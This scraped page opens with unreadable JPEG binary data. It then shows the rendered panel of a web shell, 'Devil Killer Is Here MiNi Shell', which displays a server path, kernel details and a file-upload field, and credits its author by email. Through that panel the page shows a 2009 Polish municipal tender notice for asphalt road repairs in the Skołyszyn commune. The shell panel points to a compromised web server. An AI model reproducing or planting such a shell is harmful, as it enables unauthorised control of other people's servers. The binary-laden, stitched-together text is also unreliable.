JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090603/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090603/177406-N-2009.html

<p class="kh_header"><b>Skołyszyn: Odbudowa odcinków dróg gminnych w gminie Skołyszyn - wykonanie nawierzchni bitumicznych</b><br>
<b>Numer ogłoszenia: 177406 - 2009; data zamieszczenia: 03.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy w Skołyszynie , 12, 38-242 Skołyszyn, woj. podkarpackie, tel. 013 449-10-62 do 64 w. 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.skolyszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa odcinków dróg gminnych w gminie Skołyszyn - wykonanie nawierzchni bitumicznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach zamówienia zawiera się wykonanie nawierzchni z mieszanek mineralno - bitumicznych wraz z podbudową oraz robotami ziemnymi (w zależności od technologii odbudowy), na następujących odcinkach dróg gminnych:
1)	Droga ;koło Faryj w kierunku Furmankiewicz; w Skołyszynie, Nr. ew.  388)3 - odcinek o długości 125 m (z rozjazdem) - technologia: profilowanie podłoża, podbudowa: 10 + 8 cm, nawierzchnia: 2 + 4 cm + pobocza żwirowe.
2)	Droga ;koło Janigi; w Skołyszynie, Nr. ew. 331  - odcinek o długości 134 m (z rozjazdami) - technologia: profilowanie podłoża, podbudowa: 10 + 8 cm, nawierzchnia: 2 + 4 cm + pobocza żwirowe.
3)	Droga ;koło Halerza; w Skołyszynie, Nr. ew.  309)2 - odcinek o długości 60 m - technologia: profilowanie podłoża, podbudowa: 10 + 8 cm, nawierzchnia: 2 + 4 cm.
4)	Droga ;Do Sarneckiego; w Skołyszynie, Nr. ew.  309)2 - odcinek o długości 46 m  (z rozjazdem) - technologia: profilowanie podłoża, podbudowa: 8 cm, nawierzchnia: 2 + 4 cm.
5)	Droga ;Do Barzyka; w Pustej Woli, Nr. ew. 365 - odcinek o długości 154,5 m (z rozjazdem) - technologia: profilowanie podłoża, podbudowa: 10 + 8 cm, nawierzchnia: 2 + 4 cm + pobocza żwirowe.
6)	Droga ;Do Warchoła; w Pustej Woli, Nr. ew. 295)1 - wykonanie nawierzchni rozjazdu o pow. 30,25 m2 - technologia: wyrównanie podłoża, nawierzchnia: 2 + 4 cm.
7)	Droga ;Do Gorczycy; w Pustej Woli, Nr. ew. 289 - wykonanie nawierzchni rozjazdu o pow. 49,35 m2 - technologia: nawierzchnia: 2 + 4 cm.
8)	Droga ;koło plebani w kierunku starego cmentarza; w Bączalu Dolnym, Nr. ew. 343 - odcinek o długości 54 m + rozjazd o pow. 72,75 m2 - technologia: oczyszczenie, skropienie nawierzchni, profilowanie podłoża, podbudowa: 10 + 8 cm, nawierzchnia: 2 + 4 cm + pobocza żwirowe.
9)	Droga ;Bąkówki koło Halerza; w Jabłonicy, Nr. ew.  955, 763 -  odcinek o długości 125 m wraz z likwidacją przełomu - technologia: likwidacja przełomu (rozebranie nawierzchni, pogłębienie, podbudowa 35 + 8 cm, pozostały odcinek: oczyszczenie nawierzchni, skropienie asfaltem, nawierzchnia: 5 cm.
10)	Droga ;Góry w kierunku Bani; w Jabłonicy, Nr. ew. 170 -  odcinek o długości 102 m - technologia: profilowanie podłoża, podbudowa: 10 + 8 cm, nawierzchnia: 2 + 4 cm + pobocza żwirowe.
11)	Droga ;Doły w kierunku Niemca; w Święcanach, Nr. ew.  897)4, 897)2, 899)2, 902)4 -  odcinek o długości 88 m (z rozjazdem) - technologia: profilowanie podłoża, podbudowa: 10 + 8 cm, nawierzchnia: 2 + 4 cm.
12)	Droga ;Nadole w kierunku Kośka; w Święcanach, Nr. ew. 2542 -  odcinek o długości 290 m - technologia: profilowanie podłoża, podbudowa: 10 + 8 cm, nawierzchnia: 2 + 4 cm + pobocza żwirowe.
13)	Droga ;Rędziny koło Czochary; w Święcanach, Nr. ew. 2531 - odcinek o długości  200 m  - technologia: oczyszczenie, skropienie nawierzchni asfaltem, nawierzchnia: 2 + 4 cm.
14)	Droga ;Rędziny w kierunku Kośka; w Święcanach, Nr. ew.  2532 - odcinek o długości 160 m - technologia: wyrównanie mieszanką mineralno-bitumiczną, podwójne utrwalenie emulsją asfaltową oraz roboty ziemne z wymianą przepustu na długości 70 m.
15)	Droga ;W kierunku starej szkoły; w Lipnicy Górnej, Nr. ew.  284 - odcinek o długości 100 m - technologia: profilowanie podłoża, podbudowa: 10 + 8 cm, nawierzchnia: 2 + 4 cm + pobocza żwirowe oraz roboty ziemne (oczyszczenie rowu, przebudowa przepustów) na długości  100 m.
16)	Droga ;Zamczysko; w Kunowej, Nr. ew. 95 - odcinek o długości 170 m - technologia: profilowanie podłoża, wyrównanie, podbudowa: 8 cm, nawierzchnia: 2 + 4 cm.
17)	Droga ;W kierunku Bochni; w Kunowej, Nr. ew. 315 - odcinek o długości 195 m (z rozjazdem) - technologia: ścinanie poboczy, wyrównanie podbudowy, nawierzchnia: 2 + 4 cm + pobocza żwirowe oraz roboty ziemne (przebudowa przepustu) na długości 8 m.
18)	Droga ;Gancarzówka; w Harklowej, Nr. ew.  807 - odcinek o długości 518 m - technologia: oczyszczenie i skropienie nawierzchni, nawierzchnia: 2 + 4 cm + pobocza żwirowe. 
19)	Droga ;Barzykówka; w Przysiekach, Nr. ew. 69 - dwa odcinki o długości 281 m i 73 m - technologia: profilowanie podłoża, podbudowa: 10 + 8 cm, nawierzchnia: 2 + 4 cm + pobocza żwirowe..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:  
1.  Posiadają niezbędne uprawnienia do wykonywania   określonej działalności lub czynności,   jeżeli ustawy  nakładają obowiązek posiadania takich uprawnień.
2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wykonania  w/w zadania, lub przedstawią pisemne zobowiązanie  innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania  zamówienia, w tym: 
1)  Dysponują lub będą dysponować odpowiednim sprzętem, w tym co najmniej:   rozkładarka mas bitumicznych - 1 szt.;  równiarka samojezdna - 1 szt.;  samochód samowyładowczy 5-10 t  - 1 szt.;  spycharka gąsienicowa - 1 szt.; walec statyczny samojezdny 10 t - 1 szt.; walec statyczny samojezdny ogumiony - 1 szt.; walec wibracyjny samojezdny - 1 szt.; koparka lub koparko- spycharka - 1 szt.;
2)   Dysponują lub będą dysponować odpowiednio wykwalifikowanym personelem, tj. min.: zatrudniają co najmniej 8 osób (pracowników fizycznych) oraz Kierownika robót z uprawnieniami budowlanymi w specjalności drogowej.
3)  Wykonali w okresie ostatnich pięciu lat przed wszczęciem postępowania co najmniej dwie roboty związane z wykonaniem nawierzchni z mieszanek mineralno-bitumicznych o wartości co najmniej 500 000 zł każda.
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, w tym: 
1)  Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 500.000 zł.
4.  Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 i 2 ustawy).
Sposób dokonania oceny spełnienia wymaganych warunków:
1) przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia;
2) niespełnienie chociażby jednego warunku (z uwzględnieniem zapisów art. 26 ust. 3 ustawy PZP) skutkować będzie wykluczeniem Wykonawcy z postępowania; ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
Zamawiający dopuszcza możliwość wykonania zamówienia przez podwykonawców.
Wykonawca musi wskazać w ofercie roboty, które zamierza powierzyć podwykonawcom..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca musi złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie z art.22 ust. 1 PZP oraz że nie podlega wykluczeniu na podstawie art. 24 ust. 1 PZP. Wzór oświadczenia zawarty jest na formularzu ofertowym jako zał. Nr 4 do SIWZ.
2. Zamawiający żąda w celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności i nie podlega wykluczeniu na podstawie art. 24 PZP - następujących dokumentów (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich):
1)  oświadczenia złożonego na formularzu jako zał. nr 4  do SIWZ;
2)  odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
3.   Zamawiający żąda, w celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i  doświadczenie, a także dysponuje potencjałem technicznym i osobami zdolnymi do wykonania  zamówienia, następujących dokumentów (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców oceniany będzie ich łączny  potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie) - następujących dokumentów:
1)  oświadczenia złożonego na formularzu jako zał. nr 4 do SIWZ;
2) wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, (od dnia 03.06.2004 r. do 02.06.2009 r.) a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (w tym co najmniej 2 roboty związane z wykonaniem nawierzchni z mieszanek mineralno-bitumicznych o wartości 500 000 zł każda)  - zgodnie z wzorem jako zał. nr 5 do SIWZ;
3)  wykazu osób, które będą wykonywać niniejsze zamówienie (w wykazie należy wymienić wszystkich pracowników, którzy będą wykonywać zamówienie, w tym co najmniej 8 osób  (pracowników fizycznych) oraz Kierownika robót z uprawnieniami budowlanymi  w specjalności  drogowej) - do wykazu należy dołączyć: uprawnienia kierownika robót oraz  zaświadczenie z właściwej OIIB stwierdzające przynależność do izby i aktualnie opłacane składki  - zgodnie z wzorem jako zał. nr 4 do SIWZ; 
3a)  pisemnego zobowiązania innych podmiotów do udostępnienia osób niezbędnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ppkt 3, Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował;
4)  wykazu sprzętu przewidzianego do wykonania zamówienia, w tym co najmniej :                                    
a)  rozkładarka mas bitumicznych - 1 szt.;
b)  równiarka samojezdna - 1 szt.
c)  samochód samowyładowczy 5-10 t  - 1 szt.;
d)  spycharka gąsienicowa - 1 szt.;
e)  walec statyczny samojezdny 10 t - 1 szt.;
f)  walec statyczny samojezdny ogumiony - 1 szt.;
g)  walec wibracyjny samojezdny - 1 szt.;
h)  koparka lub koparko-spycharka - 1 szt.;
- zgodnie z wzorem jako zał. nr 4 do SIWZ.
4a)  pisemnego zobowiązania innych podmiotów do udostępniania niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w ppkt 4, Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.
4.  Zamawiający żąda, w celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, następujących dokumentów  (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców oceniany będzie ich łączna sytuacja finansowa), następujących dokumentów:
1)  oświadczenia złożonego na formularzu jako zał. nr  4  do SIWZ;
2)  aktualną polisę od odpowiedzialności cywilnej lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 500.000 zł - w przypadku sumy ubezpieczenia wykazanej w walucie obcej, zamawiający przyjmie, iż sumą ubezpieczenia jest iloczyn wykazanej sumy ubezpieczenia i średniego kursu tej waluty, określonego przez Narodowy Bank Polski na dzień wszczęcia postępowania o udzielenie niniejszego zamówienia.
5.  Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej  Polskiej, zamiast dokumentów na potwierdzenie uprawnienia do wykonania określonej działalności Wykonawca postępuje zgodnie z § 2 rozporządzenia Prezesa Rady Ministrów z 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy oraz form,              w  jakich te dokumenty mogą być składane (Dz.U. Nr 87, poz. 605).
6.  Zamawiający wymaga, aby żądane przez niego dokumenty zostały złożone w formie oryginału lub  kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.skołyszyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Skołyszynie 38-242 Skołyszyn 12, pok. nr 23, tel. 013 4491062-64 wewn. 51 lub 4491751 w dni robocze, w godz.: od 7:30 do 15:30..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2009 godzina 09:00, miejsce: Oferty należy składać w Urzędzie Gminy w Skołyszynie - pok. Nr 8 UG Skołyszyn(sekretariat) w godzinach pracy tj. 7:30 do 15:30 oprócz sobót i dni ustawowo wolnych od pracy..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com